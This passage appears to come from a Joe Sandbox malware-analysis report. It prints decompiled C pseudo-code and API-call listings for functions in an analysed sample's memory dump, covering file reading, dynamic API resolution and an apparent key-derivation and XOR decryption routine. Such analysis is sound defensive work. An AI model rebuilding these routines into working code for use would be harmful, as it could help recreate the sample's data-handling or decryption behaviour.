    					if(_t64 == 0) {
    						goto L6;
    					}
    					_t35 = E00391F00(_t64, _v8, _v12);
    					if(_t35 == 0) {
    						goto L10;
    					}
    					goto L6;
    				}
    				E00399090(_t72,  &_v216, 0x10);
    				_t41 =  *0x3b8628; // 0x593938
    				_t67 = _t67 + 8;
    				_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0xe4))))( &_v216, 0x80000000, 1, 0, 3, 0x80, 0);
    				_t73 = _t34 - 0xffffffff;
    				if(_t34 == 0xffffffff) {
    					goto L13;
    				}
    				goto L2;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003B0C80
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A09
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A24
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396ADA
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B34
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B88
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C0A
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C1E
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0D1D
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00391F00: memcpy.MSVCRT ref: 00391F9C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 86%
    			E0039F3E0(intOrPtr _a4, intOrPtr _a8, void** _a12, int* _a16) {
    				char _v8;
    				char _v12;
    				void* _v16;
    				int _v20;
    				int _v24;
    				void* _t39;
    				int _t48;
    				short* _t50;
    				intOrPtr _t51;
    				void* _t52;
    				void* _t53;
    				int _t56;
    				int _t69;
    				int _t70;
    				intOrPtr _t71;
    				signed int _t72;
    				void* _t73;
    				void* _t74;
    				void* _t75;
    				void* _t76;
    
    				_t71 = _a4;
    				_t69 = 0;
    				_t56 = 0;
    				_v12 = 0;
    				_v24 = 0;
    				_v16 = 0;
    				_v8 = 0;
    				_v20 = 0;
    				if(_t71 != 0) {
    					_t39 = E00391170(_t71, 0,  &_v12, _a8);
    					_t76 = _t75 + 0x10;
    					if(_t39 != 0) {
    						_t48 = E00397B80(_v12, 0x3b3310,  &_v8, 6);
    						_t76 = _t76 + 0x10;
    						_v20 = _t48;
    						if(_t48 == 6) {
    							__imp___wtoi( *((intOrPtr*)(_v8 + 0x10)));
    							_t56 = _t48;
    							_t76 = _t76 + 4;
    							if(_t56 > 0) {
    								_t50 =  *((intOrPtr*)(_v8 + 0x14));
    								if( *_t50 == 0xd &&  *((short*)(_t50 + 2)) == 0xa) {
    									_t73 = _t71 + 1;
    									do {
    										_t51 =  *0x3b8628; // 0x593938
    										_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xc))))( *((intOrPtr*)(_t69 + _v8)));
    										_t69 = _t69 + 4;
    										_t21 = _t52 + 1; // 0x3b8628
    										_t73 = _t73 + _t21;
    									} while (_t69 < 0x14);
    									_t74 = _t73 + 2;
    									if( *((char*)(_t74 + _t56)) == 0xd &&  *((char*)(_t74 + _t56 + 1)) == 0xa) {
    										_t53 = E003A1D90(_t56, 0);
    										_t76 = _t76 + 8;
    										_v16 = _t53;
    										if(_t53 != 0) {
    											memcpy(_t53, _t74, _t56);
    											_t76 = _t76 + 0xc;
    											_v24 = 1;
    										}
    									}
    									_t69 = 0;
    								}
    							} else {
    								_t56 = 0;
    							}
    						}
    					}
    					_t40 = _v12;
    					if(_v12 != _t69) {
    						E0039BB40(_t40);
    						_t76 = _t76 + 4;
    					}
    					if(_v8 != _t69) {
    						_t70 = _v20;
    						_t72 = 0;
    						if(_t70 > 0) {
    							do {
    								E0039BB40( *((intOrPtr*)(_v8 + _t72 * 4)));
    								_t72 = _t72 + 1;
    								_t76 = _t76 + 4;
    							} while (_t72 < _t70);
    						}
    						E0039BB40(_v8);
    					}
    					 *_a12 = _v16;
    					 *_a16 = _t56;
    					return _v24;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • _wtoi.MSVCRT ref: 0039F452
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 0039F4C4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 58%
    			E00393630(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr _t14;
    				intOrPtr _t15;
    				void* _t16;
    				signed int _t20;
    				intOrPtr _t29;
    				intOrPtr _t30;
    				void* _t31;
    				void* _t32;
    
    				_t30 = _a8;
    				_t32 = __ecx;
    				_t3 = _t32 + 0x78; // 0x78
    				_t4 = _t32 + 0x74; // 0x74
    				if(E00391050(__ecx, _a4, _t30, _t4, _t3) == 0 || E003A1870(__ecx) == 0) {
    					return 0;
    				} else {
    					_t14 =  *((intOrPtr*)(__ecx + 0x10));
    					if(_t14 != 0) {
    						__imp__#6(_t14);
    					}
    					_t15 =  *0x3b8628; // 0x593938
    					_t16 =  *((intOrPtr*)( *((intOrPtr*)(_t15 + 0x1d4))))(_t30);
    					_t29 =  *0x3b8628; // 0x593938
    					_t31 = _t16;
    					_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x1ec))))(_t31) - _t31 >> 1;
    					__imp__#4(_t31, _t20);
    					 *(_t32 + 0x10) = _t20;
    					 *((intOrPtr*)(_t32 + 0x64)) = 1;
    					return 1;
    				}
    			}

    APIs
      • Part of subcall function 00391050: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?), ref: 00391083
      • Part of subcall function 00391050: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0039109C
      • Part of subcall function 00391050: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 003910B1
      • Part of subcall function 00391050: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003910DE
    • SysFreeString.OLEAUT32(?), ref: 00393668
    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00393693
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 84%
    			E003B0840(intOrPtr* __ecx, signed char _a4) {
    				intOrPtr _t6;
    				intOrPtr _t7;
    				intOrPtr _t14;
    				intOrPtr* _t15;
    				void* _t16;
    
    				_t15 = __ecx;
    				_t6 =  *((intOrPtr*)(__ecx + 8));
    				 *__ecx = 0x3b32ec;
    				if(_t6 != 0) {
    					_push(_t6);
    					L00391CB0();
    					_t16 = _t16 + 4;
    				}
    				_t7 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t7 + 0xac))))(0x3b8600);
    				_t14 =  *0x3b8628; // 0x593938
    				 *0x3b8618 =  *0x3b8618 - 1;
    				 *((intOrPtr*)( *((intOrPtr*)(_t14 + 0xc4))))(0x3b8600);
    				if((_a4 & 0x00000001) != 0) {
    					_push(_t15);
    					L00391CB0();
    				}
    				return _t15;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 33%
    			E003AED7D(void* __eax, int __ecx, signed int __edx, void* _a4, void* _a8, void* _a12, int _a16, intOrPtr _a20, signed int _a24) {
    				void* _v8;
    				signed int _v12;
    				void* _v16;
    				intOrPtr _v20;
    				int _v24;
    				signed int _v28;
    				void* _v32;
    				void _v52;
    				void _v72;
    				signed int _t82;
    				void* _t85;
    				int _t86;
    				signed int _t98;
    				signed int _t104;
    				signed int _t105;
    				signed int* _t110;
    				void* _t122;
    				int _t123;
    				int _t124;
    				intOrPtr _t128;
    				signed int _t135;
    				signed int _t136;
    				void* _t142;
    				signed int _t144;
    				signed int _t146;
    				signed int _t152;
    				signed int _t155;
    				void* _t156;
    				void* _t157;
    				void* _t167;
    				int _t169;
    				void* _t172;
    				void* _t177;
    				void* _t181;
    				void* _t183;
    				void* _t189;
    
    				_t152 = __edx;
    				asm("cdq");
    				_t82 = __eax - __edx >> 1;
    				_v12 = _t82;
    				_t123 = __ecx;
    				_v16 = _t82 + _a4;
    				_t157 =  *0x3b8538(0x200, _t156, _t167, _t122);
    				_v32 = _t157;
    				_t85 =  *0x3b8538(0x200);
    				_v8 = _t85;
    				_t86 =  *0x3b8538(0x200);
    				_v24 = _t86;
    				_v20 =  *0x3b8538(0x200);
    				memcpy(_t157, _a8, __ecx);
    				_t169 = _a16;
    				memcpy(_t157 + _t123, _a12, _t169);
    				_t124 = _t123 + _t169;
    				E003AEB87(_a4, _v12, _t157, _t124,  &_v52);
    				memcpy(_v8 + 0x10, _t157, _t124);
    				asm("cdq");
    				_t181 = _t177 + 0x38;
    				_t98 = _a24 + (_t152 & 0x0000000f) >> 4;
    				_t135 = _a24 & 0x8000000f;
    				if(_t135 < 0) {
    					_t189 = (_t135 - 0x00000001 | 0xfffffff0) + 1;
    				}
    				if(_t189 != 0) {
    					_t98 = _t98 + 1;
    				}
    				if(_t98 > 0) {
    					_a16 = _v24;
    					_v28 = _t98;
    					do {
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						E003AEB87(_a4, _v12, _v8, _t124 + 0x10, _a16);
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						E003AEB87(_a4, _v12,  &_v72, 0x10,  &_v52);
    						_a16 = _a16 + 0x10;
    						_t181 = _t181 + 0x28;
    						_t36 =  &_v28;
    						 *_t36 = _v28 - 1;
    					} while ( *_t36 != 0);
    					_t157 = _v32;
    				}
    				E003AEC77(_v16, _v12, _t157, _t124,  &_v52);
    				memcpy(_v8 + 0x14, _t157, _t124);
    				_t104 = _a24;
    				_t183 = _t181 + 0x20;
    				asm("cdq");
    				_t136 = 0x14;
    				_t105 = _t104 / _t136;
    				if(_t104 % _t136 != 0) {
    					_t105 = _t105 + 1;
    				}
    				if(_t105 > 0) {
    					_t128 = _t124 + 0x14;
    					_a4 = _v20;
    					_a16 = _t105;
    					do {
    						_t144 = 5;
    						memcpy(_v8,  &_v52, _t144 << 2);
    						E003AEC77(_v16, _v12, _v8, _t128, _a4);
    						_t146 = 5;
    						memcpy( &_v72,  &_v52, _t146 << 2);
    						E003AEC77(_v16, _v12,  &_v72, 0x14,  &_v52);
    						_a4 = _a4 + 0x14;
    						_t183 = _t183 + 0x40;
    						_t67 =  &_a16;
    						 *_t67 = _a16 - 1;
    					} while ( *_t67 != 0);
    					_t157 = _v32;
    				}
    				if(_a24 > 0) {
    					_t110 = _v24;
    					_t155 = _a24;
    					_t142 = _v20 - _t110;
    					_t172 = _a20 - _t110;
    					do {
    						 *(_t172 + _t110) =  *(_t142 + _t110) ^  *_t110;
    						_t110 =  &(_t110[0]);
    						_t155 = _t155 - 1;
    					} while (_t155 != 0);
    				}
    				 *0x3b8540(_v20);
    				 *0x3b8540(_v24);
    				 *0x3b8540(_v8);
    				return  *0x3b8540(_t157);
    			}

    APIs
    • memcpy.MSVCRT ref: 003AEDCE
    • memcpy.MSVCRT ref: 003AEDE1
      • Part of subcall function 003AEB87: memset.MSVCRT ref: 003AEB9D
      • Part of subcall function 003AEB87: memset.MSVCRT ref: 003AEBAD
      • Part of subcall function 003AEB87: memcpy.MSVCRT ref: 003AEBBF
      • Part of subcall function 003AEB87: memcpy.MSVCRT ref: 003AEBD1
    • memcpy.MSVCRT ref: 003AEE08
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC88
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC98
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECA7
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECB9
    • memcpy.MSVCRT ref: 003AEEA9
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd